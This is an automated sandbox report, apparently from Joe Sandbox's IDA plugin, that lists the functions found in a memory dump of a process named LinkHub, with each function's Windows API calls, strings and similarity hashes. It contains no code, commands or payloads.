Instruction ID: 91ba5c1cd22bc1029ee148a8b3c8145215d6cd9c5cebb1f0c3a5109cf83ed094
Opcode Fuzzy Hash: 52e8f78a3491c1cae80ddea59b776e1ffb18bb79741f6efcb11306777aa6f6a8
Instruction Fuzzy Hash: 12312634704295AFDB21DF49DC89F6837E1FB9A720F1901A4F5218B2B2CBB1AE44DB01

Function 00C1808D Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C180D0
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C180F6
SysAllocString.OLEAUT32(00000000), ref: 00C180F9
SysAllocString.OLEAUT32(?), ref: 00C18117
SysFreeString.OLEAUT32(?), ref: 00C18120
StringFromGUID2.OLE32(?,?,00000028), ref: 00C18145
SysAllocString.OLEAUT32(?), ref: 00C18153

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: e7655a9af6231d01d5d6e2ab58cf878540757ca454cd9b360a1786c52a7baa09
Instruction ID: c6683f427349391ac3638dc5d19cf492b69adf64ac7bb5b24fbfe677866cc150
Opcode Fuzzy Hash: e7655a9af6231d01d5d6e2ab58cf878540757ca454cd9b360a1786c52a7baa09
Instruction Fuzzy Hash: 56219776604219BF9F10EFA8CC84EFE73ACFB0A3607148525F915DB290DA74DD869760

Function 00C18164 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C181A9
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C181CF
SysAllocString.OLEAUT32(00000000), ref: 00C181D2
SysAllocString.OLEAUT32 ref: 00C181F3
SysFreeString.OLEAUT32 ref: 00C181FC
StringFromGUID2.OLE32(?,?,00000028), ref: 00C18216
SysAllocString.OLEAUT32(?), ref: 00C18224

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 44cdb26cb20718f086f33c4513a48dd58dfc5c71e9208355cecead376ed7df32
Instruction ID: c9999dc43117a58235b2f092b7f47e717e0044035e090d694f08c1a2b0485e8c
Opcode Fuzzy Hash: 44cdb26cb20718f086f33c4513a48dd58dfc5c71e9208355cecead376ed7df32
Instruction Fuzzy Hash: 4421B636604104BF9B10EFA8DC88EEE77ECFB0A3607008125F915CB2A0DA74ED85D764

Function 00C20E79 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00C20E99
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C20ED5

Strings

nul, xrefs: 00C20F0E

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 11e6c219371a5e28e873a36d364bb5e1bfb3550de59c878a71602a6456e841c2
Instruction ID: e6b34b0e53637edb75b4eb0bd2b278c8d3fe73946578c7ff48d3cd70f71b71c1
Opcode Fuzzy Hash: 11e6c219371a5e28e873a36d364bb5e1bfb3550de59c878a71602a6456e841c2
Instruction Fuzzy Hash: 46219E74540319ABDB309F69E904B9A77A8BF45320F300A1AFDA5D36D2D7B09940CB10

Function 00C20F4E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00C20F6D
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C20FA8

Strings

nul, xrefs: 00C20FE0

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 28779254f42837186de4989031df6613fd3773b583f3fdfb86ea0daf20daf7aa
Instruction ID: 32d6380d7d3b452a14d76cc3944dfb2091cefdfbe76408fe6de5b558f5461c95
Opcode Fuzzy Hash: 28779254f42837186de4989031df6613fd3773b583f3fdfb86ea0daf20daf7aa
Instruction Fuzzy Hash: 4821A1356003259BDB309F69AC04B9A77A8BF65730F340A19FCB2E36D1D7B09980DB50

Function 00C44B4B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB7873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00BB78B1
Part of subcall function 00BB7873: GetStockObject.GDI32(00000011), ref: 00BB78C5
Part of subcall function 00BB7873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BB78CF

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00C44BB0
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00C44BBD
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00C44BC8
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00C44BD7
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00C44BE3

Strings

Msctls_Progress32, xrefs: 00C44B81

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: c41501088c430d4bdb0f4aeeaebdce1abb37cfad5f5682c686b9c417dc2bcf0e
Instruction ID: 4a695765b0dd018088ab477599a09388d768b78062c7ce6d8d2df145cc8be35e
Opcode Fuzzy Hash: c41501088c430d4bdb0f4aeeaebdce1abb37cfad5f5682c686b9c417dc2bcf0e
Instruction Fuzzy Hash: A51193B2140219BFEF119E65CC85FEB7F9DFF08758F114110B618A6090CA71DC219BA4

Function 00BEDB5F Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00BEDB23: _free.LIBCMT ref: 00BEDB4C

_free.LIBCMT ref: 00BEDBAD

Part of subcall function 00BE2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00BEDB51,?,00000000,?,00000000,?,00BEDB78,?,00000007,?,?,00BEDF75,?), ref: 00BE2D4E
Part of subcall function 00BE2D38: GetLastError.KERNEL32(?,?,00BEDB51,?,00000000,?,00000000,?,00BEDB78,?,00000007,?,?,00BEDF75,?,?), ref: 00BE2D60

_free.LIBCMT ref: 00BEDBB8
_free.LIBCMT ref: 00BEDBC3
_free.LIBCMT ref: 00BEDC17
_free.LIBCMT ref: 00BEDC22
_free.LIBCMT ref: 00BEDC2D
_free.LIBCMT ref: 00BEDC38

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
Instruction ID: e42e5787ba8fa4172b46bf3736a4da0bb7b8c4802314fe0f6305420e8da9e597
Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
Instruction Fuzzy Hash: 8B116072541B88BAD620BBB2CC07FCB77DCAF04701F414CE9B299AA252EBB5B5158750

Function 00C1E30E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00C1E328
LoadStringW.USER32(00000000), ref: 00C1E32F
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00C1E345
LoadStringW.USER32(00000000), ref: 00C1E34C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C1E390

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00C1E36D

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: f6a3cbe07766d3c23cbb2cfa2f61a13acb55bbdfc9621e99b7e94708d88ebbd9
Instruction ID: 1b1eb31fce85c685973fb281e34ca76927632a9f5ad3a8e05c9a32a683b853ca
Opcode Fuzzy Hash: f6a3cbe07766d3c23cbb2cfa2f61a13acb55bbdfc9621e99b7e94708d88ebbd9
Instruction Fuzzy Hash: 940181F69003087FE711ABA49D89FEF776CEB09300F4145A1BB0AE6051EA749E849B75

Function 00C21312 Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00C21322
EnterCriticalSection.KERNEL32(00000000,?), ref: 00C21334
TerminateThread.KERNEL32(00000000,000001F6), ref: 00C21342
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00C21350
CloseHandle.KERNEL32(00000000), ref: 00C2135F
InterlockedExchange.KERNEL32(?,000001F6), ref: 00C2136F
LeaveCriticalSection.KERNEL32(00000000), ref: 00C21376

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 5581a2cfba0a6b63fabab005a9db407eafc8816b8e65507141d26254733e74bc
Instruction ID: 8e7459918e8fc5c2b9aad36343e26d6f322bc1b7997a36d51f6d3bc4d8990153
Opcode Fuzzy Hash: 5581a2cfba0a6b63fabab005a9db407eafc8816b8e65507141d26254733e74bc
Instruction Fuzzy Hash: B8F0EC36142612BBD7516F54EE49BDABB3AFF06312F441121F10295CB087B49971CF90

Function 00C326BD Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00C3281D
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00C3283E
WSAGetLastError.WSOCK32 ref: 00C3284F
htons.WSOCK32(?,?,?,?,?), ref: 00C32938
inet_ntoa.WSOCK32(?), ref: 00C328E9

Part of subcall function 00C1433E: _strlen.LIBCMT ref: 00C14348

Part of subcall function 00C33C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00C2F669), ref: 00C33C9D

_strlen.LIBCMT ref: 00C32992

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: 640adb847376c4d54d2c051c02fbe14d5c399e7494bf650d53e9fd79158ad6ba
Instruction ID: adcac2171672cee5d90a58399b80f86d114a71b66e0ca151460ff245994ad980
Opcode Fuzzy Hash: 640adb847376c4d54d2c051c02fbe14d5c399e7494bf650d53e9fd79158ad6ba
Instruction Fuzzy Hash: D1B1D135604300AFD724DF24C885F6ABBE5EF85318F54858CF4A65B2A2DB71EE41CB91

Function 00BE0527 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 00BE042A
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BE0446
__allrem.LIBCMT ref: 00BE045D
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BE047B
__allrem.LIBCMT ref: 00BE0492
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BE04B0

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 675459f4f124bd2af17bf05e9c9e87198950a75667ee82f7844c946ca9c63f73
Instruction ID: 3815f9dffccd198d4309230e5a7f496dbb3c6bcaefcec120fec413d65eea92d3
Opcode Fuzzy Hash: 675459f4f124bd2af17bf05e9c9e87198950a75667ee82f7844c946ca9c63f73
Instruction Fuzzy Hash: C881E77261074A9BE720BF6ACC81B6A73F8EF54324F2441AAF511D76C1E7B0D9818754

Function 00BE6571 Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00BD8649,00BD8649,?,?,?,00BE67C2,00000001,00000001,8BE85006), ref: 00BE65CB
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00BE67C2,00000001,00000001,8BE85006,?,?,?), ref: 00BE6651
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00BE674B
__freea.LIBCMT ref: 00BE6758

Part of subcall function 00BE3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00BD0165,?,?,00C211D9,0000FFFF), ref: 00BE3BC5

__freea.LIBCMT ref: 00BE6761
__freea.LIBCMT ref: 00BE6786

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 7e7994579ca47ed903ae9c0f0e7c87cdff47e6632376d379afaf19c6946f416f
Instruction ID: 6528686a57569dff53b67b2c2e6b2e1cdd4173910f20b4d1fd97a41b21c430e4
Opcode Fuzzy Hash: 7e7994579ca47ed903ae9c0f0e7c87cdff47e6632376d379afaf19c6946f416f
Instruction Fuzzy Hash: 3B51F372610286AFDB258F66CC85EBF77E9EF60794F1406A9FC15D7140EB34DC5086A0

Function 00C3C63B Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00BBB329: _wcslen.LIBCMT ref: 00BBB333

Part of subcall function 00C3D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C3C10E,?,?), ref: 00C3D415
Part of subcall function 00C3D3F8: _wcslen.LIBCMT ref: 00C3D451
Part of subcall function 00C3D3F8: _wcslen.LIBCMT ref: 00C3D4C8
Part of subcall function 00C3D3F8: _wcslen.LIBCMT ref: 00C3D4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C3C72A
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C3C785
RegCloseKey.ADVAPI32(00000000), ref: 00C3C7CA
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00C3C7F9
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00C3C853
RegCloseKey.ADVAPI32(?), ref: 00C3C85F

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: ca6180bf27bccb06255d1f3ea9bf7f621ff0f837f9144fb78a994095538bd676
Instruction ID: 92b21f999eb148a59d4324d18d72bed6bcf97ea105a424530abffcd092a95436
Opcode Fuzzy Hash: ca6180bf27bccb06255d1f3ea9bf7f621ff0f837f9144fb78a994095538bd676
Instruction Fuzzy Hash: AB81AF74218241AFC714DF24C8C5E6ABBE5FF85308F14849CF49A5B2A2DB71EE05CB92

Function 00C1009D Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 00C100A9
SysAllocString.OLEAUT32(00000000), ref: 00C10150
VariantCopy.OLEAUT32(00C10354,00000000), ref: 00C10179
VariantClear.OLEAUT32(00C10354), ref: 00C1019D
VariantCopy.OLEAUT32(00C10354,00000000), ref: 00C101A1
VariantClear.OLEAUT32(?), ref: 00C101AB

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: 98615b15bc85dd533434de945e614da3283d9dfd4720d778a83cd134ab1e7eb0
Instruction ID: 6681b86f3a9b6a4d67b0b5465b728e0661187e8b751937ecf90865d62e191ca9
Opcode Fuzzy Hash: 98615b15bc85dd533434de945e614da3283d9dfd4720d778a83cd134ab1e7eb0
Instruction Fuzzy Hash: 7E51A635600320ABDF10AB659899BA9B3E5AF47710F349447F806DF296DBF09CC0EB55

Function 00C29B51 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 00BB41EA: _wcslen.LIBCMT ref: 00BB41EF

Part of subcall function 00BB8577: _wcslen.LIBCMT ref: 00BB858A

GetOpenFileNameW.COMDLG32(00000058), ref: 00C29F2A
_wcslen.LIBCMT ref: 00C29F4B
_wcslen.LIBCMT ref: 00C29F72
GetSaveFileNameW.COMDLG32(00000058), ref: 00C29FCA

Strings

X, xrefs: 00C29E57

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: 1d9864af714c7760dd059f24909fa62332fdd2b596330099b36fef48382f45da
Instruction ID: 06e3aa177ff32caea535443719928570496c77765bb523eae9d0613d81b6ad40
Opcode Fuzzy Hash: 1d9864af714c7760dd059f24909fa62332fdd2b596330099b36fef48382f45da
Instruction Fuzzy Hash: BAE161316083509FD724EF24D881BAAB7E4FF84314F1485ADF8999B2A2DB71DD05CB92

Function 00C26ED3 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00C26F21
CoInitialize.OLE32(00000000), ref: 00C2707E
CoCreateInstance.OLE32(00C50CC4,00000000,00000001,00C50B34,?), ref: 00C27095
CoUninitialize.OLE32 ref: 00C27319

Strings

.lnk, xrefs: 00C26EFF, 00C26F69, 00C27025

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: 1ddce1cc959c419514a581eb64133e1b65f03a1797cf5670f111473d31dd6843
Instruction ID: d2768e58fa658d6236e427825aa3ae0e0b72f1fbc63c0d00820d0ea491a4f6b6
Opcode Fuzzy Hash: 1ddce1cc959c419514a581eb64133e1b65f03a1797cf5670f111473d31dd6843
Instruction Fuzzy Hash: 12D13A71508211AFC304EF24D881EABB7E8FF94704F40496DF5969B262DBB1ED49CB92

Function 00BB1B00 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00BB249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00BB24B0

BeginPaint.USER32(?,?,?), ref: 00BB1B35
GetWindowRect.USER32(?,?), ref: 00BB1B99
ScreenToClient.USER32(?,?), ref: 00BB1BB6
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00BB1BC7
EndPaint.USER32(?,?,?,?,?), ref: 00BB1C15
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00BF3287

Part of subcall function 00BB1C2D: BeginPath.GDI32(00000000), ref: 00BB1C4B

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

